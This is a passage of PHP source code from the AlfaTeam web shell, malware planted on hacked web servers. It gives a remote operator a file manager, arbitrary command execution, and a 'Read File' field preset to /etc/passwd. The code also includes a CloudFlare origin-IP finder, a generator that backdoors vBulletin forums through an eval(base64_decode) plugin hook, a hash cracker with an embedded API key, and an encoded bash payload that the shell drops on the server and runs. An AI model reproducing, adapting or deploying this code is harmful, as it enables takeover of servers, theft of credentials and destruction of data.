2685if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
2686$url = explode($matches[0], $url);
2687$url = $url[1];}}
2688if(is_array($server))$server = $server[0];
2689echo __pre();
2690if(preg_match('/cloudflare/i', $server))
2691echo "\n[+] CloudFlare detected: {$server}\n<br>";
2692else
2693echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
2694echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
2695echo "[+] Searching for more IP addresses.\n\n<br><br>";
2696for($x=0;$x<count($subs);$x++){
2697$site = $subs[$x] . $url;
2698$ip = is_ipv4(gethostbyname($site));
2699if($ip == '(Null)')
2700continue;
2701echo "Trying {$site}: {$ip}\n<br>";
2702}
2703echo "\n[+] Finished.\n<br>";
2704}
2705echo '</div>';
2706alfafooter();
2707}
2708function is_ipv4($ip){
2709return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
2710}
2711function __alert($s){
2712echo '<center>'.__pre().$s.'</center>';
2713}
2714function create_table($data){
2715echo '<table border="1">';
2716foreach ($data as $key => $val){
2717$array = array();
2718foreach($val as $k => $v){
2719$array[$k] = $v;
2720}
2721echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
2722}
2723echo '</table>';
2724}
2725function alfaphp2xml(){
2726alfahead();
2727AlfaNum(8,9,10,7,6,5,4,3);
2728echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
2729<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
2730<input type='submit' name='go' value=' ' /></p></form></center>";
2731if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
2732echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
2733echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
2734echo '</textarea></center></p>';
2735}
2736echo '</center></div>';
2737alfafooter();
2738}
2739function alfacpcrack(){
2740alfahead();
2741echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
2742if($_POST['alfa1']=='dec'){
2743$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
2744echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
2745<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
2746foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
2747echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2748if($_POST['alfa3'] == '>>'){
2749$hash = $_POST['alfa2'];
2750if(!empty($hash)){
2751$hash_type = $_POST['alfa4'];
2752$email = "solevisible@gmail.com";
2753$code = "7b9fa79f92c3cd96";
2754$target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
2755$resp = @file_get_contents($target);
2756if($resp==''){
2757$get = new AlfaCURL();
2758$resp = $get->Send($target);
2759}
2760echo __pre().'<center>';
2761switch($resp){
2762 case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
2763 case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
2764 case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
2765 case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
2766}
2767if(substr($resp,0,4)!='CODE'&&$resp!=''){
2768echo "<b>Result: <font color='green'>".$resp."</font></b>";
2769}elseif(substr($resp,0,4)!='CODE'){
2770echo "<font color='red'>NoT Found</font><br />";
2771}
2772echo('</center>');
2773}
2774}
2775}
2776if($_POST['alfa1']=='analyzer'){
2777echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
2778<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
2779<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2780if($_POST['alfa3'] == '>>'){
2781$hash = $_POST['alfa2'];
2782if(!empty($hash)){
2783$curl = new AlfaCURL();
2784$resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
2785echo(__pre().'<center>');
2786if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
2787 echo('<font color="green">'.$s[1].'</font>');
2788}else{
2789 echo('<font color="red">Not Found...!</font>');
2790}
2791echo('</center><br>');
2792}
2793}
2794}
2795echo '</div>';
2796alfafooter();
2797}
2798function alfafooter(){
2799if(!isset($_POST['ajax'])){
2800echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
2801<tr>
2802<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
2803<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
2804<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
2805<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
2806</tr>
2807<tr>
2808<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
2809<td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
2810</tr>
2811<tr>
2812<td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
2813</tr>
2814<tr>
2815<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
2816<input type='hidden' name='a' value='FilesMAn'>
2817<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
2818<input type='hidden' name='alfa1' value='uploadFile'>
2819<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
2820<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong> Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam © 2012-".date('Y')." ]</span></td>
2821</tr>
2822</table>
2823</div>
2824<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>
2825<div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>
2826<div id='update-content'></div>
2827<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>
2828<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
2829<script>
2830 $('search-input').addEventListener('keydown', function(e){
2831 setTimeout(function(){
2832 var string = $('search-input').value
2833 d.getElementsByClassName('history-list')[0].innerHTML = '';
2834 for(var i in editor_files){
2835 if(editor_files[i].file.search(string) != -1 || string == ''){
2836 var mode = 0;
2837 if(i == editor_current_file){
2838 mode = ' is_active';
2839 }
2840 insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
2841 }
2842 }
2843 }, 100);
2844 },false);
2845 _Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
2846 d.body.insertAdjacentHTML('beforeend', res);
2847 });
2848 if(".$GLOBALS["need_to_update_header"]."){
2849 _Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){
2850 try{
2851 var data = JSON.parse(res);
2852 console.log(data);
2853 for(var i in data){
2854 var html = '';
2855 for(var b = 0; b < data[i].length; b++){
2856 if(i=='useful'||i=='downloader'){
2857 html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';
2858 }else{
2859 html += data[i][b];
2860 }
2861 }
2862 var elem = $('header_'+i);
2863 if(elem){elem.innerHTML = html;}
2864 }
2865 $('header_cgishell').innerHTML = 'ON';
2866 $('header_cgishell').setAttribute('class', 'header_on');
2867 }catch(e){console.log(e)}
2868 });
2869 }else if(islinux){
2870 _Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){
2871 if(res=='ok'){
2872 $('header_cgishell').innerHTML = 'ON';
2873 $('header_cgishell').setAttribute('class', 'header_on');
2874 }
2875 });
2876 }
2877</script>
2878</body>
2879</html>
2880";
2881}}
2882if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
2883function posix_getpwuid($p) {return false;} }
2884if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
2885function posix_getgrgid($p) {return false;} }
2886function alfaWhich($p) {
2887$path = alfaEx('which ' . $p,false,false);
2888if(!empty($path))
2889return strlen($path);
2890return false;
2891}
2892function alfaSize($s) {
2893if($s >= 1073741824)
2894return sprintf('%1.2f', $s / 1073741824 ). ' GB';
2895elseif($s >= 1048576)
2896return sprintf('%1.2f', $s / 1048576 ) . ' MB';
2897elseif($s >= 1024)
2898return sprintf('%1.2f', $s / 1024 ) . ' KB';
2899else
2900return $s . ' B';
2901}
2902function alfaPerms($p) {
2903if (($p & 0xC000) == 0xC000)$i = 's';
2904elseif (($p & 0xA000) == 0xA000)$i = 'l';
2905elseif (($p & 0x8000) == 0x8000)$i = '-';
2906elseif (($p & 0x6000) == 0x6000)$i = 'b';
2907elseif (($p & 0x4000) == 0x4000)$i = 'd';
2908elseif (($p & 0x2000) == 0x2000)$i = 'c';
2909elseif (($p & 0x1000) == 0x1000)$i = 'p';
2910else $i = 'u';
2911$i .= (($p & 0x0100) ? 'r' : '-');
2912$i .= (($p & 0x0080) ? 'w' : '-');
2913$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
2914$i .= (($p & 0x0020) ? 'r' : '-');
2915$i .= (($p & 0x0010) ? 'w' : '-');
2916$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
2917$i .= (($p & 0x0004) ? 'r' : '-');
2918$i .= (($p & 0x0002) ? 'w' : '-');
2919$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
2920return $i;
2921}
2922function alfaPermsColor($f,$isbash=false){
2923$class = "";
2924$num = "";
2925$human = "";
2926if($isbash){
2927$class = $f["class"];
2928$num = $f["num"];
2929$human = $f["human"];
2930}else{
2931$num = substr(sprintf('%o', @fileperms($f)),-4);
2932$human = alfaPerms(@fileperms($f));
2933if(!@is_readable($f))
2934$class = "main_red_perm";
2935elseif (!@is_writable($f))
2936$class = "main_white_perm";
2937else
2938$class = "main_green_perm";
2939}
2940return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
2941}
2942if(!function_exists("scandir")) {
2943function scandir($dir) {
2944$dh = opendir($dir);
2945while (false !== ($filename = readdir($dh)))
2946$files[] = $filename;
2947return $files;
2948}
2949}
2950function reArrayFiles($file_post){
2951$file_ary = array();
2952$file_count = count($file_post['name']);
2953$file_keys = array_keys($file_post);
2954for ($i=0; $i<$file_count; $i++) {
2955foreach ($file_keys as $key) {
2956$file_ary[$i][$key] = $file_post[$key][$i];
2957}
2958}
2959return $file_ary;
2960}
2961function _alfa_can_runCommand($cgi=true,$cache=true){
2962 if(isset($_SESSION["alfa_canruncmd"])&&$cache){
2963 return true;
2964 }
2965 if(strlen(alfaEx("whoami",false,$cgi))>0){
2966 $_SESSION["alfa_canruncmd"] = true;
2967 return true;
2968 }
2969 return false;
2970}
2971function _alfa_symlink($target, $link){
2972 $phpsym = function_exists("symlink");
2973 if($phpsym){
2974 @symlink($target, $link);
2975 }else{
2976 alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
2977 }
2978}
2979function _alfa_file_exists($file,$cgi=true){
2980 if(@file_exists($file)){
2981 return true;
2982 }else{
2983 if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
2984 return true;
2985 }
2986 }
2987 return false;
2988}
2989function _alfa_file($file,$cgi=true){
2990 $array = @file($file);
2991 if(!$array){
2992 if(strlen(alfaEx("id",false,$cgi))>0){
2993 $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
2994 if(strlen($data)>0){
2995 return explode("\n", $data);
2996 }else{
2997 return false;
2998 }
2999 }else{
3000 return false;
3001 }
3002 }else{
3003 return $array;
3004 }
3005}
3006function _alfa_is_writable($file){
3007 $check = false;
3008 $check = @is_writable($file);
3009 if(!$check){
3010 if(_alfa_can_runCommand()){
3011 $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
3012 if($check == "yes"){
3013 $check = true;
3014 }else{
3015 $check = false;
3016 }
3017 }
3018 }
3019 return $check;
3020}
3021function _alfa_is_dir($dir,$mode="-d"){
3022 $check = false;
3023 $check = @is_dir($dir);
3024 if(!$check){
3025 if(_alfa_can_runCommand()){
3026 $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
3027 if($check == "yes"){
3028 return true;
3029 }else{
3030 return false;
3031 }
3032 }
3033 }
3034 return $check;
3035}
3036function alfaFilesMan(){
3037alfahead();
3038AlfaNum(8,9,10,7,6,5,4);
3039echo '<div class="ajaxarea"><div class="header">';
3040if(!empty ($_COOKIE['f']))
3041$_COOKIE['f'] = @unserialize($_COOKIE['f']);
3042if(!empty($_POST['alfa1'])){
3043switch($_POST['alfa1']){
3044case 'uploadFile':
3045if(isset($GLOBALS['glob_chdir_false'])){
3046 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3047 $move_cmd_file = true;
3048}
3049$files = reArrayFiles($_FILES['f']);
3050foreach($files as $file){
3051if($move_cmd_file){
3052 alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
3053}else{
3054 @move_uploaded_file($file['tmp_name'],$file['name']);
3055}
3056echo "uped...!<Br>";
3057}
3058break;
3059case 'mkdir':
3060$new_dir_cmd = false;
3061if(isset($GLOBALS['glob_chdir_false'])){
3062 if(_alfa_can_runCommand(true,true)){
3063 alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
3064 }
3065}else{
3066if(!@mkdir(trim($_POST['alfa2'])))
3067echo "<b><font color='red'>Can't create new dir !</b></font>";
3068}
3069break;
3070case 'delete':
3071function deleteDir($path){
3072$path = (substr($path,-1)=='/') ? $path:$path.'/';
3073$dh = @opendir($path);
3074while(($item = @readdir($dh)) !== false){
3075$item = $path.$item;
3076if((basename($item) == "..") || (basename($item) == "."))
3077continue;
3078$type = @filetype($item);
3079if ($type == "dir")
3080deleteDir($item);
3081else
3082@unlink($item);
3083}
3084@closedir($dh);
3085@rmdir($path);
3086}
3087if(is_array(@$_POST['f']))
3088foreach($_POST['f'] as $f){
3089if($f == '..')
3090continue;
3091$f = rawurldecode($f);
3092if(isset($GLOBALS["glob_chdir_false"])){
3093 if(_alfa_can_runCommand(true,true)){
3094 alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
3095 }
3096}else{
3097alfaEx("rm -rf '".addslashes($f)."'",false,false);
3098if(@is_dir($f))
3099deleteDir($f);
3100else
3101@unlink($f);
3102}
3103}
3104if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
3105deleteDir(rawurldecode(@$_POST['alfa2']));
3106alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
3107}else{
3108@unlink(rawurldecode(@$_POST['alfa2']));
3109}
3110if(isset($GLOBALS["glob_chdir_false"])){
3111 $source = rawurldecode(@$_POST['alfa2']);
3112 if($source!='..'&&!empty($source)){
3113 if(_alfa_can_runCommand(true,true)){
3114 alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
3115 }
3116 }
3117}
3118break;
3119case 'paste':
3120if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){
3121function copy_paste($c,$s,$d){
3122if(@is_dir($c.$s)){
3123@mkdir($d.$s);
3124$h = @opendir($c.$s);
3125while (($f = @readdir($h)) !== false)
3126if (($f != ".") and ($f != ".."))
3127copy_paste($c.$s.'/',$f, $d.$s.'/');
3128} elseif(is_file($c.$s))
3129@copy($c.$s, $d.$s);
3130}
3131foreach($_SESSION['f'] as $f)
3132copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
3133}elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){
3134function move_paste($c,$s,$d){
3135if(@is_dir($c.$s)){
3136@mkdir($d.$s);
3137$h = @opendir($c.$s);
3138while (($f = @readdir($h)) !== false)
3139if(($f != ".") and ($f != ".."))
3140copy_paste($c.$s.'/',$f, $d.$s.'/');
3141}elseif(@is_file($c.$s))
3142@copy($c.$s, $d.$s);
3143}
3144foreach($_SESSION['f'] as $f)
3145@rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
3146}elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){
3147if(class_exists('ZipArchive')){
3148$zip = new ZipArchive();
3149$zipX = "alfa_".rand(1,1000).".zip";
3150if($zip->open($zipX, 1)){
3151@chdir($_SESSION['c']);
3152foreach($_SESSION['f'] as $f){
3153if($f == '..')continue;
3154if(@is_file($_SESSION['c'].$f))
3155$zip->addFile($_SESSION['c'].$f, $f);
3156elseif(@is_dir($_SESSION['c'].$f)){
3157$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
3158foreach($iterator as $key=>$value){
3159$key = str_replace('\\','/',realpath($key));
3160if(@is_dir($key)){
3161if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
3162}else{$zip->addFile($key,$key);}}}}
3163@chdir($GLOBALS['cwd']);
3164$zip->close();
3165__alert('>> '.$zipX.' << is created...');}}
3166}elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){
3167if(class_exists('ZipArchive')){
3168$zip = new ZipArchive();
3169foreach($_SESSION['f'] as $f) {
3170if($zip->open($_SESSION['c'].$f)){
3171$zip->extractTo($GLOBALS['cwd']);
3172$zip->close();}}}}
3173unset($_SESSION['f']);
3174break;
3175default:
3176if(!empty($_POST['alfa1'])){
3177$_SESSION['act'] = @$_POST['alfa1'];
3178$_SESSION['f'] = @$_POST['f'];
3179$_SESSION['c'] = @$_POST['c'];
3180}
3181break;
3182}
3183}
3184if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){
3185 $dirContent = @scandir($_SESSION[__LAST_CWD__]);
3186}else{
3187 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
3188 if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
3189 $path = explode('/', $res[1]);
3190 array_pop($path);
3191 $_POST['c'] = implode('/', $path);
3192 }
3193 $_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);
3194}
3195$cmd_dir = false;
3196if($dirContent === false){
3197 if(_alfa_can_runCommand(true,true)){
3198 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
3199 if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){
3200 $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
3201 alfaWriteTocgiapi("getdir.alfa",$bash);
3202 }
3203 if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";
3204 $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");
3205 $dirContent = json_decode($dirContent, true);
3206 if(is_array($dirContent)){
3207 array_pop($dirContent);
3208 $cmd_dir = true;
3209 }else{
3210 $dirContent = false;
3211 }
3212 $_SESSION["alfachdir_bash"] = true;
3213 }
3214}
3215if($dirContent == false){
3216echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
3217alfaFooter();
3218return;
3219}
3220global $sort;
3221$sort = array('name', 1);
3222if(!empty($_POST['alfa1'])) {
3223if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
3224$sort = array($match[1], (int)$match[2]);
3225}
3226echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
3227$dirs = $files = array();
3228$n = count($dirContent);
3229for($i=0;$i<$n;$i++){
3230if($cmd_dir){
3231$filename = $dirContent[$i]["name"];
3232$file_owner = $dirContent[$i]["owner"];
3233$file_group = $dirContent[$i]["group"];
3234$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
3235$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
3236$file_size = $dirContent[$i]["size"];
3237$file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];
3238}else{
3239$filename = $dirContent[$i];
3240$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
3241$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
3242$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
3243$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
3244$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
3245$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
3246$file_size = @filesize($GLOBALS['cwd'].$filename);
3247$file_path = $GLOBALS['cwd'].$filename;
3248}
3249$tmp = array('name' => $filename,
3250'path' => $file_path,
3251'modify' => $file_modify,
3252'perms' => $file_perm,
3253'size' => $file_size,
3254'owner' => $file_owner,
3255'group' => $file_group
3256);
3257if(!$cmd_dir){
3258if(@is_file($file_path))
3259$files[] = array_merge($tmp, array('type' => 'file'));
3260elseif(@is_link($file_path))
3261$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
3262elseif(@is_dir($file_path)&& ($filename != "."))
3263$dirs[] = array_merge($tmp, array('type' => 'dir'));
3264}else{
3265 if($dirContent[$i]["type"]=="file"){
3266 $files[] = array_merge($tmp, array('type' => 'file'));
3267 }else{
3268 if($dirContent[$i]["name"] != "."){
3269 $dirs[] = array_merge($tmp, array('type' => 'dir'));
3270 }
3271 }
3272}
3273}
3274$GLOBALS['sort'] = $sort;
3275function alfaCmp($a, $b) {
3276if($GLOBALS['sort'][0] != 'size')
3277return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
3278else
3279return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
3280}
3281usort($files, "alfaCmp");
3282usort($dirs, "alfaCmp");
3283$files = array_merge($dirs, $files);
3284$l=0;
3285$cc=0;
3286foreach($files as $f){
3287$f['name'] = htmlspecialchars($f['name']);
3288$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
3289$checkbox = 'checkbox'.$cc;
3290$raw_name = rawurlencode($f['name']);
3291$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
3292$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
3293echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
